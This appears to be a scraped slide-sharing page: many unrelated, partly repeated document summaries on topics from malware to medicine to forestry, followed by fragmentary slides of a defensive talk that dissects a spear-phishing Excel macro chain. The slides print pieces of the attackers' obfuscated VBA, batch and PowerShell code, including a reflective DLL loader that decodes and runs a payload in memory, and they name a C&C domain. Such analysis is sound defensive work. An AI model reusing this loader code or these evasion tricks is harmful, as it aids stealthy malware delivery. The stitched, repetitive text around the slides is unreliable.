The document discusses an analysis of a malicious VBA macro embedded in an Excel file that was part of a spear phishing attack. The VBA macro contains obfuscated code that sets environment variables and executes a batch file to download and run additional malware on the infected system. The presentation covers deobfuscating and analyzing the VBA and batch code to understand the techniques used to evade detection.
The document discusses the analysis of malicious VBA macros and batch files used by the Chamchicon malware to obfuscate its activities and evade detection. It describes how the malware uses complex variable renaming and string replacement techniques in its VBA and batch code to hide malicious commands and bypass antivirus detection. Disassembly and debugging of the macros and batches revealed obfuscated commands to download and execute additional payloads on the infected system.
This document discusses the OWASP Top 10, which is a list of the most critical web application security risks. It provides details on each of the top 10 risks, including examples of how they can occur and recommendations for how to address them. The top risks are: #1- Cross-Site Scripting (XSS), #2 - SQL Injection, #3 - Malicious File Execution, #4 - Insecure Direct Object Reference, #5 - Cross-Site Request Forgery (CSRF), #6 - Security Misconfiguration, #7 - Broken Authentication and Session Management, #8 - Insecure Cryptographic Storage, #9 - Insecure Communication, and #10 - Failure to Restrict URL Access. For each
The document reports on a study examining radial audiometry in patients with obstructive hydrocephalus before and after third ventriculostomy. The preoperative radioudiography identified radiopharmaceutical reflux into the lateral cerebral ventricles with delayed clearance for over 60 minutes, similar to the findings of radioudiography of communicating hydrocephalus. However, the cause of venticular radiopharmaceutical reflux is not yet understood, possibly associated with reversal of normal cerebrospinal fluid flow through the fenestration on the third ventricle floor.
Al Fazl International - 1st January 2016 Weekly UKmuzaffertahir9
(1) This document provides information on the number of vehicles inspected and passing inspection in Saudi Arabia between 2016-01-01 and 2016-07-01. A total of 2,301 vehicles were inspected, with 1,395 vehicles passing inspection.
(2) Additional details are given on the number of vehicles inspected and passing inspection on a monthly basis during this period.
(3) Contact information is provided for two automotive service centers in London.
The document discusses opportunities for sustainable forestry and local food systems in Central Appalachia. It recognizes that while farming has faced challenges, the region is still agricultural with potential for growth. Key opportunities include:
- Developing processing, aggregation, and distribution infrastructure to connect farmers to institutional markets while continuing direct sales outlets.
- Technical and business skills training for local producers.
- Entrepreneurial support and knowledge-sharing to add value to forest and farm products.
- Forest restoration, particularly on mined land, with support for wood product certification and rural job creation.
Sustainable forestry and agriculture can enhance long-term economic benefits for Central Appalachia while
The document summarizes the key points discussed at a meeting. The meeting addressed concerns about a rise in crime in the area. It was noted that more police patrols would be assigned to hot spots. Community organizations will also be engaged to help curb crime and promote safety. Residents are encouraged to report any suspicious activity to the authorities.
The document discusses the analysis of malicious VBA macros and batch files used by the Chamchicon malware to obfuscate its activities and evade detection. It describes how the malware uses complex variable renaming and string replacement techniques in its VBA and batch code to hide malicious commands and bypass antivirus detection. Disassembly and debugging of the macros and batches revealed obfuscated commands to download and execute additional payloads on the infected system.
This document discusses the OWASP Top 10, which is a list of the most critical web application security risks. It provides details on each of the top 10 risks, including examples of how they can occur and recommendations for how to address them. The top risks are: #1- Cross-Site Scripting (XSS), #2 - SQL Injection, #3 - Malicious File Execution, #4 - Insecure Direct Object Reference, #5 - Cross-Site Request Forgery (CSRF), #6 - Security Misconfiguration, #7 - Broken Authentication and Session Management, #8 - Insecure Cryptographic Storage, #9 - Insecure Communication, and #10 - Failure to Restrict URL Access. For each
The document reports on a study examining radial audiometry in patients with obstructive hydrocephalus before and after third ventriculostomy. The preoperative radioudiography identified radiopharmaceutical reflux into the lateral cerebral ventricles with delayed clearance for over 60 minutes, similar to the findings of radioudiography of communicating hydrocephalus. However, the cause of venticular radiopharmaceutical reflux is not yet understood, possibly associated with reversal of normal cerebrospinal fluid flow through the fenestration on the third ventricle floor.
Al Fazl International - 1st January 2016 Weekly UKmuzaffertahir9
(1) This document provides information on the number of vehicles inspected and passing inspection in Saudi Arabia between 2016-01-01 and 2016-07-01. A total of 2,301 vehicles were inspected, with 1,395 vehicles passing inspection.
(2) Additional details are given on the number of vehicles inspected and passing inspection on a monthly basis during this period.
(3) Contact information is provided for two automotive service centers in London.
The document discusses opportunities for sustainable forestry and local food systems in Central Appalachia. It recognizes that while farming has faced challenges, the region is still agricultural with potential for growth. Key opportunities include:
- Developing processing, aggregation, and distribution infrastructure to connect farmers to institutional markets while continuing direct sales outlets.
- Technical and business skills training for local producers.
- Entrepreneurial support and knowledge-sharing to add value to forest and farm products.
- Forest restoration, particularly on mined land, with support for wood product certification and rural job creation.
Sustainable forestry and agriculture can enhance long-term economic benefits for Central Appalachia while
The document summarizes the key points discussed at a meeting. The meeting addressed concerns about a rise in crime in the area. It was noted that more police patrols would be assigned to hot spots. Community organizations will also be engaged to help curb crime and promote safety. Residents are encouraged to report any suspicious activity to the authorities.
This document describes the geometry and meshing of different nozzle configurations for a computational fluid dynamics (CFD) simulation of a rocket engine. It discusses the ideal nozzle geometry, as well as nozzle configurations for 15mm, 30mm, and 45mm diameter nozzles with liquid and solid propellant. Meshes are generated for each nozzle and comparisons are made between the different configurations.
(1) The document discusses a meeting between representatives to discuss border issues. It notes the key topics discussed were demarcation of borders, illegal border crossings, and increased cooperation between the two entities.
(2) Both sides agreed on the importance of clearly defining the border and preventing unauthorized crossings. Representatives committed to further discussions to find solutions and strengthen relations.
(3) In a brief summary, the document outlines the main agenda items and goals discussed during the meeting around border management and security.
Practical action research work place conflict and strategy solving the proble...berhanu taye
1. The document discusses workplace conflict and strategies for solving problems. It mentions insulting behavior, attempts to offend, bullying, and intimidation of innocents.
2. It proposes changing strategies if apologies are not offered, and starting legal proceedings to seek justice. The goal is to establish equality before the law.
3. Several recommendations are provided to address corruption, including advocating for economic policies that do not encourage rent-seeking behavior. Improving oversight of government bodies is also suggested.
Instrumentos para evaluación del lenguaje.pdfEDITH SANTANA
The document discusses an evaluation of cognitive development in children aged 2 to 6 years old using the Peabody Picture Vocabulary Test (PPVT-5), which assessed their receptive vocabulary. The test was individually administered and took between 15 to 20 minutes, evaluating the child's ability to understand words and point to corresponding images. The results provide insight into the child's cognitive development levels and can help identify potential learning delays or giftedness.
This document discusses mathematical equations for calculating various values related to summaries of documents. It begins with an introduction to the purpose and contact information for the document. It then presents four equations labeled K, M, N, and T for calculating summary length values based on original document length, desired summary percentage, and other factors. The equations and their solutions are explained for different summary requirements.
This document provides tips and rules for writing good Flex code to avoid being fired or facing other negative consequences. It begins with introductions of the author and intended audience. Next, it defines what constitutes bad code and why developers write it. The bulk of the document provides examples of bad Flex code snippets and explains what is wrong with each in terms of maintainability, performance, or separation of concerns. It concludes by listing rules for writing good code and inviting questions.
Ruby on Rails is a web application framework built on the Ruby programming language. It utilizes the MVC pattern with ActiveRecord as the ORM layer to simplify interactions with the database. Rails emphasizes conventions like implicit associations and validations to minimize configuration. Its goal is to maximize developer productivity through features like automatic SQL generation and an active community of developers.
This document discusses shape-shifting spam and how Hadoop can help fight against it. It describes the challenges of spam filtering at scale given spammers' ability to rapidly change their techniques. It outlines the evolution of anti-spam techniques from manual and rule-based approaches to machine learning models. It then introduces Hadoop and how its distributed processing capabilities allow for more expressive models that can learn from large datasets and quickly update to match spammers' changes. Examples are given of how Hadoop enables standard reporting, ad hoc queries, campaign discovery, and other applications to provide insights into spammer behavior.
LinkedIn is a professional networking platform with over 85 million members. Its mission is to connect professionals to make them more productive and successful. The document discusses LinkedIn's JavaScript API, which allows easy integration of LinkedIn sign in and profile retrieval without needing to handle OAuth authentication. It provides examples of using the API to sign in users and retrieve a profile, displaying name, industry, connection degree, and summary.
1. The document provides examples of using CALL EXECUTE in SAS for programmers, statisticians, and data managers.
2. For programmers, CALL EXECUTE is used to include all SAS programs in a directory automatically.
3. For statisticians, it is used to generate consistent symbol statements for graphs based on treatment values from a data set.
4. For data managers, it allows searching through libnames for incorrect data by executing data checks using values from a data set.
Detecting Malicious Websites using Machine LearningAndrew Beard
We present a set of newly tuned algorithms that can distinguish between malicious and non-malicious websites with a high degree of accuracy using Machine Learning (ML). We use the Bro IDS/IPS tool for extracting the SSL certificates from network traffic and training the ML algorithms.
The extracted SSL attributes are then loaded into multiple ML frameworks such as Splunk, AWS ML and we run a series of classification algorithms to identify those attributes that correlate with malicious sites.
Our analysis shows that there are a number of emerging patterns that even allow for identification of high-jacked devices and self-signed certificates. We present the results of our analysis which show which attributes are the most relevant for detecting malicious SSL certificates and as well the performance of the ML algorithms.
This document discusses various security best practices for PHP applications, including sanitizing user input, validating data, preventing SQL injection and cross-site scripting (XSS), securely storing passwords, using cookies safely, and enabling error logging and reporting. It outlines 12 steps like sanitizing input, validating data types, escaping output, and disabling register_globals to help make PHP applications more secure.
Rails Antipatterns | Open Session with Chad Pytel Engine Yard
As developers worldwide have adopted the Ruby on Rails web framework, many have fallen victim to common mistakes that reduce code quality, performance, reliability, stability, scalability, and maintainability. Even experienced developers will find that they can reevaluate the work they've done and make it better.
In this session, Chad Pytel will provide an overview of some of these common mistakes as well as take questions from the audience and provide real-world advice. Bring your issues and get expert advice on how to bring your code in line with today's best practices.
The document discusses migrating from the HTML::Template template engine to Template Toolkit. It describes some of the key differences between the two engines and the process involved in converting templates from one to the other. Tips are provided for the conversion including avoiding reserved keywords and variable naming conventions to ensure a smooth migration.
1. The document discusses building web interfaces using Ruby on Rails. It covers useful Rails view helper techniques, plugins for adding helper and unobtrusive JavaScript functionality, and implementing common UI design patterns.
2. The handicraft_helper plugin allows building complex HTML structures more easily using a composite pattern. The handicraft_ujs plugin replaces Rails' default Ajax functionality with an unobtrusive JavaScript approach using jQuery.
3. The presentation demonstrates helper techniques, the two plugins, and implementing UI patterns like inline editing and sortable lists.
This document summarizes the solutions to 7 challenges from the RootedCon CTF 2010 competition by the Plaid Parliament of Pwning security group. The challenges involved gaining administrator access, exploiting login forms, reading fortune files, following links to files, using SQL injections to view data, making an online purchase, and decrypting packed JavaScript. The solutions used techniques like cookie manipulation, file backups, SQL injections, LDAP injections, and JavaScript unpacking.
The document discusses various techniques for evading XSS filters, including ModSecurity. It provides examples of how filters like ModSecurity can miss attacks that use encoding, unusual tags, or JavaScript tricks. The filters are shown to be ineffective against attacks that avoid common keywords or use alternative encodings.
The document discusses various cross-site scripting (XSS) attacks and evasion techniques that can bypass common XSS filters like ModSecurity and PHP-IDS. It provides examples of XSS payloads that exploit weaknesses in these filters and evade detection. Recommended defenses include strengthening XSS filters by improving regular expressions and rulesets.
Rails 3 And The Real Secret To High Productivity Presentationrailsconf
Rails 3 focuses on making JavaScript more unobtrusive and agnostic by moving it out of view templates and into separate JavaScript files. It also improves the routing and controller architecture by adding more flexibility and abstraction. The real secret to high productivity with Rails is maintaining an open dialogue with stakeholders to renegotiate requirements as needed.
This document describes the geometry and meshing of different nozzle configurations for a computational fluid dynamics (CFD) simulation of a rocket engine. It discusses the ideal nozzle geometry, as well as nozzle configurations for 15mm, 30mm, and 45mm diameter nozzles with liquid and solid propellant. Meshes are generated for each nozzle and comparisons are made between the different configurations.
(1) The document discusses a meeting between representatives to discuss border issues. It notes the key topics discussed were demarcation of borders, illegal border crossings, and increased cooperation between the two entities.
(2) Both sides agreed on the importance of clearly defining the border and preventing unauthorized crossings. Representatives committed to further discussions to find solutions and strengthen relations.
(3) In a brief summary, the document outlines the main agenda items and goals discussed during the meeting around border management and security.
Practical action research work place conflict and strategy solving the proble...berhanu taye
1. The document discusses workplace conflict and strategies for solving problems. It mentions insulting behavior, attempts to offend, bullying, and intimidation of innocents.
2. It proposes changing strategies if apologies are not offered, and starting legal proceedings to seek justice. The goal is to establish equality before the law.
3. Several recommendations are provided to address corruption, including advocating for economic policies that do not encourage rent-seeking behavior. Improving oversight of government bodies is also suggested.
Instrumentos para evaluación del lenguaje.pdfEDITH SANTANA
The document discusses an evaluation of cognitive development in children aged 2 to 6 years old using the Peabody Picture Vocabulary Test (PPVT-5), which assessed their receptive vocabulary. The test was individually administered and took between 15 to 20 minutes, evaluating the child's ability to understand words and point to corresponding images. The results provide insight into the child's cognitive development levels and can help identify potential learning delays or giftedness.
This document discusses mathematical equations for calculating various values related to summaries of documents. It begins with an introduction to the purpose and contact information for the document. It then presents four equations labeled K, M, N, and T for calculating summary length values based on original document length, desired summary percentage, and other factors. The equations and their solutions are explained for different summary requirements.
This document provides tips and rules for writing good Flex code to avoid being fired or facing other negative consequences. It begins with introductions of the author and intended audience. Next, it defines what constitutes bad code and why developers write it. The bulk of the document provides examples of bad Flex code snippets and explains what is wrong with each in terms of maintainability, performance, or separation of concerns. It concludes by listing rules for writing good code and inviting questions.
Ruby on Rails is a web application framework built on the Ruby programming language. It utilizes the MVC pattern with ActiveRecord as the ORM layer to simplify interactions with the database. Rails emphasizes conventions like implicit associations and validations to minimize configuration. Its goal is to maximize developer productivity through features like automatic SQL generation and an active community of developers.
This document discusses shape-shifting spam and how Hadoop can help fight against it. It describes the challenges of spam filtering at scale given spammers' ability to rapidly change their techniques. It outlines the evolution of anti-spam techniques from manual and rule-based approaches to machine learning models. It then introduces Hadoop and how its distributed processing capabilities allow for more expressive models that can learn from large datasets and quickly update to match spammers' changes. Examples are given of how Hadoop enables standard reporting, ad hoc queries, campaign discovery, and other applications to provide insights into spammer behavior.
LinkedIn is a professional networking platform with over 85 million members. Its mission is to connect professionals to make them more productive and successful. The document discusses LinkedIn's JavaScript API, which allows easy integration of LinkedIn sign in and profile retrieval without needing to handle OAuth authentication. It provides examples of using the API to sign in users and retrieve a profile, displaying name, industry, connection degree, and summary.
1. The document provides examples of using CALL EXECUTE in SAS for programmers, statisticians, and data managers.
2. For programmers, CALL EXECUTE is used to include all SAS programs in a directory automatically.
3. For statisticians, it is used to generate consistent symbol statements for graphs based on treatment values from a data set.
4. For data managers, it allows searching through libnames for incorrect data by executing data checks using values from a data set.
Detecting Malicious Websites using Machine LearningAndrew Beard
We present a set of newly tuned algorithms that can distinguish between malicious and non-malicious websites with a high degree of accuracy using Machine Learning (ML). We use the Bro IDS/IPS tool for extracting the SSL certificates from network traffic and training the ML algorithms.
The extracted SSL attributes are then loaded into multiple ML frameworks such as Splunk, AWS ML and we run a series of classification algorithms to identify those attributes that correlate with malicious sites.
Our analysis shows that there are a number of emerging patterns that even allow for identification of high-jacked devices and self-signed certificates. We present the results of our analysis which show which attributes are the most relevant for detecting malicious SSL certificates and as well the performance of the ML algorithms.
This document discusses various security best practices for PHP applications, including sanitizing user input, validating data, preventing SQL injection and cross-site scripting (XSS), securely storing passwords, using cookies safely, and enabling error logging and reporting. It outlines 12 steps like sanitizing input, validating data types, escaping output, and disabling register_globals to help make PHP applications more secure.
Rails Antipatterns | Open Session with Chad Pytel Engine Yard
As developers worldwide have adopted the Ruby on Rails web framework, many have fallen victim to common mistakes that reduce code quality, performance, reliability, stability, scalability, and maintainability. Even experienced developers will find that they can reevaluate the work they've done and make it better.
In this session, Chad Pytel will provide an overview of some of these common mistakes as well as take questions from the audience and provide real-world advice. Bring your issues and get expert advice on how to bring your code in line with today's best practices.
The document discusses migrating from the HTML::Template template engine to Template Toolkit. It describes some of the key differences between the two engines and the process involved in converting templates from one to the other. Tips are provided for the conversion including avoiding reserved keywords and variable naming conventions to ensure a smooth migration.
1. The document discusses building web interfaces using Ruby on Rails. It covers useful Rails view helper techniques, plugins for adding helper and unobtrusive JavaScript functionality, and implementing common UI design patterns.
2. The handicraft_helper plugin allows building complex HTML structures more easily using a composite pattern. The handicraft_ujs plugin replaces Rails' default Ajax functionality with an unobtrusive JavaScript approach using jQuery.
3. The presentation demonstrates helper techniques, the two plugins, and implementing UI patterns like inline editing and sortable lists.
This document summarizes the solutions to 7 challenges from the RootedCon CTF 2010 competition by the Plaid Parliament of Pwning security group. The challenges involved gaining administrator access, exploiting login forms, reading fortune files, following links to files, using SQL injections to view data, making an online purchase, and decrypting packed JavaScript. The solutions used techniques like cookie manipulation, file backups, SQL injections, LDAP injections, and JavaScript unpacking.
The document discusses various techniques for evading XSS filters, including ModSecurity. It provides examples of how filters like ModSecurity can miss attacks that use encoding, unusual tags, or JavaScript tricks. The filters are shown to be ineffective against attacks that avoid common keywords or use alternative encodings.
The document discusses various cross-site scripting (XSS) attacks and evasion techniques that can bypass common XSS filters like ModSecurity and PHP-IDS. It provides examples of XSS payloads that exploit weaknesses in these filters and evade detection. Recommended defenses include strengthening XSS filters by improving regular expressions and rulesets.
Rails 3 And The Real Secret To High Productivity Presentationrailsconf
Rails 3 focuses on making JavaScript more unobtrusive and agnostic by moving it out of view templates and into separate JavaScript files. It also improves the routing and controller architecture by adding more flexibility and abstraction. The real secret to high productivity with Rails is maintaining an open dialogue with stakeholders to renegotiate requirements as needed.
This document discusses tuning Solr for better relevancy in search results. It covers Solr schema basics like field types and analyzers. It also describes Apache Solr module hooks in Drupal that can modify queries for filtering, boosting, or processing results. The document suggests using the query debug tool and checking field analyzers to understand why certain content ranks highly. Finally, it lists some other Apache Solr modules that can enhance search, like handling attachments or implementing autocomplete suggestions.
The document discusses various techniques for generating fake traffic to websites and blogs through automated means, such as using scripts to repeatedly request pages and images from sites while varying settings like delays, user agents, and IP addresses to avoid detection. It also talks about ways to make oneself appear more famous or successful online through tactics like pretending to be a tech expert or social media guru. Some ads displayed on blogs are also examined in an effort to only extract the image files and not trigger impressions.
Clearance: Simple, complete Ruby web app authentication.Jason Morrison
This document discusses Clearance, an authentication gem for Ruby on Rails applications. It provides instructions for installing Clearance and includes code examples for integrating authentication functionality into a Rails model and controllers. It also outlines some future work items like refactoring, documentation, and additional authentication strategies.
NTUT provides two email accounts and access to software through the NTUT Cloud. The document discusses how to access and use various online tools and APIs to retrieve open data sources on the internet. It provides instructions for using command line interfaces in Ubuntu, Google Colab, and other environments to make API calls, download files, and work with data. Regular expressions are also introduced as a tool for parsing text and extracting specific patterns.
Similar to Dissecting professional APT team's spear tip (20)
Preparing Non - Technical Founders for Engaging a Tech AgencyISH Technologies
Preparing non-technical founders before engaging a tech agency is crucial for the success of their projects. It starts with clearly defining their vision and goals, conducting thorough market research, and gaining a basic understanding of relevant technologies. Setting realistic expectations and preparing a detailed project brief are essential steps. Founders should select a tech agency with a proven track record and establish clear communication channels. Additionally, addressing legal and contractual considerations and planning for post-launch support are vital to ensure a smooth and successful collaboration. This preparation empowers non-technical founders to effectively communicate their needs and work seamlessly with their chosen tech agency.Visit our site to get more details about this. Contact us today www.ishtechnologies.com.au
WWDC 2024 Keynote Review: For CocoaCoders AustinPatrick Weigel
Overview of WWDC 2024 Keynote Address.
Covers: Apple Intelligence, iOS18, macOS Sequoia, iPadOS, watchOS, visionOS, and Apple TV+.
Understandable dialogue on Apple TV+
On-device app controlling AI.
Access to ChatGPT with a guest appearance by Chief Data Thief Sam Altman!
App Locking! iPhone Mirroring! And a Calculator!!
Mobile App Development Company In Noida | Drona InfotechDrona Infotech
Drona Infotech is a premier mobile app development company in Noida, providing cutting-edge solutions for businesses.
Visit Us For : https://www.dronainfotech.com/mobile-application-development/
8 Best Automated Android App Testing Tool and Framework in 2024.pdfkalichargn70th171
Regarding mobile operating systems, two major players dominate our thoughts: Android and iPhone. With Android leading the market, software development companies are focused on delivering apps compatible with this OS. Ensuring an app's functionality across various Android devices, OS versions, and hardware specifications is critical, making Android app testing essential.
What to do when you have a perfect model for your software but you are constrained by an imperfect business model?
This talk explores the challenges of bringing modelling rigour to the business and strategy levels, and talking to your non-technical counterparts in the process.
Artificia Intellicence and XPath Extension FunctionsOctavian Nadolu
The purpose of this presentation is to provide an overview of how you can use AI from XSLT, XQuery, Schematron, or XML Refactoring operations, the potential benefits of using AI, and some of the challenges we face.
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdfVALiNTRY360
Salesforce Healthcare CRM, implemented by VALiNTRY360, revolutionizes patient management by enhancing patient engagement, streamlining administrative processes, and improving care coordination. Its advanced analytics, robust security, and seamless integration with telehealth services ensure that healthcare providers can deliver personalized, efficient, and secure patient care. By automating routine tasks and providing actionable insights, Salesforce Healthcare CRM enables healthcare providers to focus on delivering high-quality care, leading to better patient outcomes and higher satisfaction. VALiNTRY360's expertise ensures a tailored solution that meets the unique needs of any healthcare practice, from small clinics to large hospital systems.
For more info visit us https://valintry360.com/solutions/health-life-sciences
14 th Edition of International conference on computer visionShulagnaSarkar2
About the event
14th Edition of International conference on computer vision
Computer conferences organized by ScienceFather group. ScienceFather takes the privilege to invite speakers participants students delegates and exhibitors from across the globe to its International Conference on computer conferences to be held in the Various Beautiful cites of the world. computer conferences are a discussion of common Inventions-related issues and additionally trade information share proof thoughts and insight into advanced developments in the science inventions service system. New technology may create many materials and devices with a vast range of applications such as in Science medicine electronics biomaterials energy production and consumer products.
Nomination are Open!! Don't Miss it
Visit: computer.scifat.com
Award Nomination: https://x-i.me/ishnom
Conference Submission: https://x-i.me/anicon
For Enquiry: Computer@scifat.com
UI5con 2024 - Boost Your Development Experience with UI5 Tooling ExtensionsPeter Muessig
The UI5 tooling is the development and build tooling of UI5. It is built in a modular and extensible way so that it can be easily extended by your needs. This session will showcase various tooling extensions which can boost your development experience by far so that you can really work offline, transpile your code in your project to use even newer versions of EcmaScript (than 2022 which is supported right now by the UI5 tooling), consume any npm package of your choice in your project, using different kind of proxies, and even stitching UI5 projects during development together to mimic your target environment.
Hand Rolled Applicative User ValidationCode KataPhilip Schwarz
Could you use a simple piece of Scala validation code (granted, a very simplistic one too!) that you can rewrite, now and again, to refresh your basic understanding of Applicative operators <*>, <*, *>?
The goal is not to write perfect code showcasing validation, but rather, to provide a small, rough-and ready exercise to reinforce your muscle-memory.
Despite its grandiose-sounding title, this deck consists of just three slides showing the Scala 3 code to be rewritten whenever the details of the operators begin to fade away.
The code is my rough and ready translation of a Haskell user-validation program found in a book called Finding Success (and Failure) in Haskell - Fall in love with applicative functors.
Microservice Teams - How the cloud changes the way we workSven Peters
A lot of technical challenges and complexity come with building a cloud-native and distributed architecture. The way we develop backend software has fundamentally changed in the last ten years. Managing a microservices architecture demands a lot of us to ensure observability and operational resiliency. But did you also change the way you run your development teams?
Sven will talk about Atlassian’s journey from a monolith to a multi-tenanted architecture and how it affected the way the engineering teams work. You will learn how we shifted to service ownership, moved to more autonomous teams (and its challenges), and established platform and enablement teams.
2. About this talk
• LINE’s employees got emails with malicious attachments,
2018 Dec
• So did many corporates in Japan
• Could be APT, or a mass mailer
• I’d like to share what kind of tricks are forged in this spear-tip
• Might help you understand why autoanalysis system fails
• Might help you to work on obfuscated scripts
3. whoami
• Heungsoo Kang
• Securing LINE @ GrayLab
• My career involves …
• Reverse engineering, Antivirus, code obfuscation,
Malware/APT/exploit analysis & campaign tracking
11. VBA macro
• VBA code
• Not an expert, but everything is straight forward if you
are familiar with any programming language.
• Sub my_func(Argument1 As Long) As String
….
my_func = “this is how you return something”
End Sub
23. • So following string will be… x63x6dx64… == cmd…
VBA macro
24. VBA macro
• Simple way to see deobfuscated result?
• Change “Shell” function to “MsgBox”? (like printf)
• (or) The grammar is similar so just use python
34. batch
• No, echo will not work, if there are some pipes and
ampersands (|, &)
• ex) echo test | clip & xyxy
35. batch
• Convert from batch to python using replace from editor
• Escape quotes / double quotes
• Batch allows variable name starting with number. So
put _ in front, etc
63. powershell 4(cont’d)
• The other most of powershell script is reflective DLL
loading
Function import-dllimports
{
Param(
[Parameter(posiTION = 0, MAnDAtORY = ${tRUE})]
[System.Object]
${pEiNFo},
[Parameter(pOsITIOn = 1, mAnDatorY = ${tRUe})]
[System.Object]
${wIN32FUnCTIOnS},
Function import-dllinremoteprocess
{
Param(
[Parameter(pOSiTION=0, manDATOry=${TRUE})]
[IntPtr]
${REMoteproChAndlE},
Function Get-WIn32fUNcTionS
{
${WIn32FuNCTiONS} = new-object System.Object
${vIRtUAlaLlOCaDDR} = Get-ProcAddress kernel32.dll VirtualAlloc
${virtUALALLOcdelEgaTE} = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
${virTUALAlloc} = [System.Runtime.InteropServices.Marshal]::"gETDELegATeForFUNcTioNpoINTEr"(${VIrTUALAlloCaDdR}, $
{ViRtuAlalLoCdEleGATe})
${Win32FUNcTioNS} | Add-Member NoteProperty -Name VirtualAlloc -Value ${VIrTUALaLLoC}
64. powershell 4(cont’d)
• The other most of powershell script is reflective DLL
loading
Function CREatE-RemOtETHrEaD
{
Param(
[Parameter(pOsITion = 1, mAndatoRy = ${TRUE})]
[IntPtr]
${PrOcesShANdLE},
[Parameter(pOsiTiON = 2, mANDAtorY = ${tRue})]
[IntPtr]
${stArtaDdreSs},
Function COPY-SectIONs
{
Param(
[Parameter(pOsITION = 0, mAnDaTORy = ${tRUE})]
[Byte[]]
${pebytes},
Function mAIn
{
${WIN32FUNCTIonS} = Get-Win32Functions
${win32types} = Get-Win32Types
${WiN32ConStANTS} = Get-Win32Constants
${remoTepROcHANDlE} = [IntPtr]::"zeRo"
if ((${procid} -ne ${NUlL}) -and (${procid} -ne 0) -and (${procname} -ne ${NuLL}) -and (${procname} -ne ""))
{
Throw ""
}
65. Reflective DLL loading?
• When attacker wants to load a DLL malware,
LoadLibrary(“mydll.dll”);
- this way, DLL should be on disk. Meaning AV filter driver
will have a chance to sense it and take a look
• So it is quite common to load a DLL directly to memory, by
not using LoadLibrary API, but make yourself a similar
function to load a DLL into memory.
• Memory loading, resolve import address table, resolve
relocation, etc
• Open source! (C/C++, powershell, ASM, etc)
66. powershell 4(cont’d)
• The decoded PE is loaded to memory
Function Main{
if (!${pebytes}) {
${pebytes} = [System.Convert]::"FroMBaSe64STRiNg"(${glOBaL:MGGG}); # base64 decode to PE buffer
}
${E_MagIc} = (${pebytes}[0..1] | &('%') {[Char] ${_}}) -join '' # check MZ header
if (${E_magiC} -ne 'MZ'){
throw ''
}
if (-not ${doNOtzERomZ}) { # remove MZ value in PE header (to evade memory dump analysis)
${pebytes}[0] = 0
${pebytes}[1] = 0
}
if (${EXeArgs} -ne ${nULl} -and ${EXeaRGs} -ne ''){
${eXeARGS} = "ReflectiveExe $ExeArgs"
}
else{
${exEaRGS} = "ReflectiveExe"
}
if (${CoMpUTeRnAme} -eq ${nUll} -or ${CoMPuTERnaME} -imatch “^s*$”){ # reflective DLL loading with/without computer name
Invoke-Command -ScriptBlock ${remotescriptblock} -ArgumentList @(${pebytes}, ${funcreturntype}, ${procid}, ${procname},${forceaslr})
}
else{
Invoke-Command -ScriptBlock ${remotescriptblock} -ArgumentList @(${pebytes}, ${funcreturntype}, ${procid}, ${procname},${forceaslr})
-ComputerName ${cOmPutErnAmE}
}
}
67. DLL
• I dumped the decrypted DLL
• MD5: 9734DC58262DB411CE50322CB57A7379
• SHA256:
6d88756625bf8ff65b12fd68e94520eac22996803b4711
7a37e4fb3484220823
72. DLL
• Some automation system marked it as BlackEnergy
• http://tinyurl.com/blackenergy1
• Description on banking trojan Bebloh family is closer
• http://tinyurl.com/bebloh1
• BlackEnergy relation to Bebloh
• http://tinyurl.com/bebloh2
• BlackEnergy? Bebloh?
• Can be one, both or neither
73. DLL - Automatic analysis
• https://app.any.run/tasks/a5e35165-
c614-427c-9373-6d8a596c6567
• Still doesn’t work
74. DLL
• Typical downloader/reverse shell
• Injects itself to explorer.exe
• C&C: cabertun.com
• Downloads configuration/new files
• According to configuration, executes/injects payload
92. Summary
• Campaign
• XLS with macro
• Obfuscated vba/batch/powershell scripts
• Steganography using public image hosting service
• In-memory DLL loading (no disk-write == no filter driver trigger)
• Many anti-detection/automation tricks
• Open web server for only short time to accept real victims only